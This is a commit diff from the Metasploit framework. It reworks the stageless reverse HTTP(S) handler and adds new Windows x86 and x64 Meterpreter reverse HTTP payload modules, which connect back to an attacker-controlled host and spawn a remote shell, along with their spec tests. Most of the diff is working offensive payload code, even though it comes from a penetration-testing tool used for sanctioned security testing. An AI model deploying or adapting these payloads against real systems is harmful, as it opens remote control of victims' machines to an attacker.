Land rapid7#5095 - OJ adds stageless http transports

Author: Brent Cook

lib/msf/core/handler/reverse_http/stageless.rb

@@ -26,35 +26,30 @@ def initialize_stageless
     ], self.class)
   end
 
-  def generate_stageless(&block)
-    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}#{generate_uri_uuid_mode(:connect)}/"
+  def generate_stageless(opts={})
+    unless opts[:generator]
+      raise ArgumentError, "Stageless generation requires a generator argument"
+    end
 
-    unless block_given?
-      raise ArgumentError, "Stageless generation requires a block argument"
+    if opts[:ssl].nil?
+      raise ArgumentError, "Stageless generation requires an ssl argument"
     end
 
-    # invoke the given function to generate the architecture specific payload
-    block.call(url) do |dll|
+    url = "http#{opts[:ssl] ? "s" : ""}://#{datastore['LHOST']}:#{datastore['LPORT']}"
+    url << "#{generate_uri_uuid_mode(:connect)}/"
 
-      # TODO: figure out this bit
-      # patch the target ID into the URI if specified
-      #if opts[:target_id]
-      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
-      #  if i
-      #    t = opts[:target_id].to_s
-      #    raise "Target ID must be less than 5 bytes" if t.length > 4
-      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
-      #    print_status("Patching Target ID #{t} into DLL")
-      #    dll[i, u.length] = u
-      #  end
-      #end
+    # invoke the given function to generate the architecture specific payload
+    opts[:generator].call(url) do |dll|
 
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
+      verify_cert_hash = nil
+      if opts[:ssl]
+        verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                             datastore['HandlerSSLCert'])
+      end
 
       Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
         :url           => url,
-        :ssl           => true,
+        :ssl           => opts[:ssl],
         :ssl_cert_hash => verify_cert_hash,
         :expiration    => datastore['SessionExpirationTimeout'].to_i,
         :comm_timeout  => datastore['SessionCommunicationTimeout'].to_i,

modules/payloads/singles/windows/meterpreter_reverse_http.rb

@@ -0,0 +1,47 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+require 'msf/core/handler/reverse_http/stageless'
+require 'msf/core/payload/windows/stageless_meterpreter'
+require 'msf/base/sessions/meterpreter_x86_win'
+require 'msf/base/sessions/meterpreter_options'
+
+module Metasploit4
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Windows::StagelessMeterpreter
+  include Msf::Handler::ReverseHttp::Stageless
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info = {})
+
+    super(merge_info(info,
+      'Name'        => 'Windows Meterpreter Shell, Reverse HTTP Inline',
+      'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
+      'Author'      => [ 'OJ Reeves' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Session'     => Msf::Sessions::Meterpreter_x86_Win
+      ))
+
+    initialize_stageless
+  end
+
+  def generate
+    # generate a stageless payload using the x86 version of
+    # the stageless generator
+    opts = {
+      :ssl       => false,
+      :generator => method(:generate_stageless_x86)
+    }
+    generate_stageless(opts)
+  end
+
+end

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -7,7 +7,6 @@
 require 'msf/core/handler/reverse_https'
 require 'msf/core/handler/reverse_http/stageless'
 require 'msf/core/payload/windows/stageless_meterpreter'
-require 'msf/core/payload/uuid_options'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 
@@ -38,8 +37,11 @@ def initialize(info = {})
   def generate
     # generate a stageless payload using the x86 version of
     # the stageless generator
-    generate_stageless(&method(:generate_stageless_x86))
+    opts = {
+      :ssl       => true,
+      :generator => method(:generate_stageless_x86)
+    }
+    generate_stageless(opts)
   end
 
 end
-

modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb

@@ -0,0 +1,47 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+require 'msf/core/handler/reverse_http/stageless'
+require 'msf/core/payload/windows/x64/stageless_meterpreter'
+require 'msf/base/sessions/meterpreter_x64_win'
+require 'msf/base/sessions/meterpreter_options'
+
+module Metasploit4
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Windows::StagelessMeterpreter_x64
+  include Msf::Handler::ReverseHttp::Stageless
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info = {})
+
+    super(merge_info(info,
+      'Name'        => 'Windows Meterpreter Shell, Reverse HTTP Inline (x64)',
+      'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
+      'Author'      => [ 'OJ Reeves' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X64,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Session'     => Msf::Sessions::Meterpreter_x64_Win
+      ))
+
+    initialize_stageless
+  end
+
+  def generate
+    # generate a stageless payload using the x64 version of
+    # the stageless generator
+    opts = {
+      :ssl       => false,
+      :generator => method(:generate_stageless_x64)
+    }
+    generate_stageless(opts)
+  end
+
+end

modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb

@@ -37,9 +37,11 @@ def initialize(info = {})
   def generate
     # generate a stageless payload using the x64 version of
     # the stageless generator
-    generate_stageless(&method(:generate_stageless_x64))
+    opts = {
+      :ssl       => true,
+      :generator => method(:generate_stageless_x64)
+    }
+    generate_stageless(opts)
   end
 
 end
-
-

spec/modules/payloads_spec.rb

@@ -2453,6 +2453,16 @@
                           reference_name: 'windows/meterpreter_bind_tcp'
   end
 
+  context 'windows/meterpreter_reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/meterpreter_reverse_http'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/meterpreter_reverse_http'
+  end
+
   context 'windows/meterpreter_reverse_https' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -3529,6 +3539,16 @@
                           reference_name: 'windows/x64/meterpreter_bind_tcp'
   end
 
+  context 'windows/x64/meterpreter_reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/windows/x64/meterpreter_reverse_http'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter_reverse_http'
+  end
+
   context 'windows/x64/meterpreter_reverse_https' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [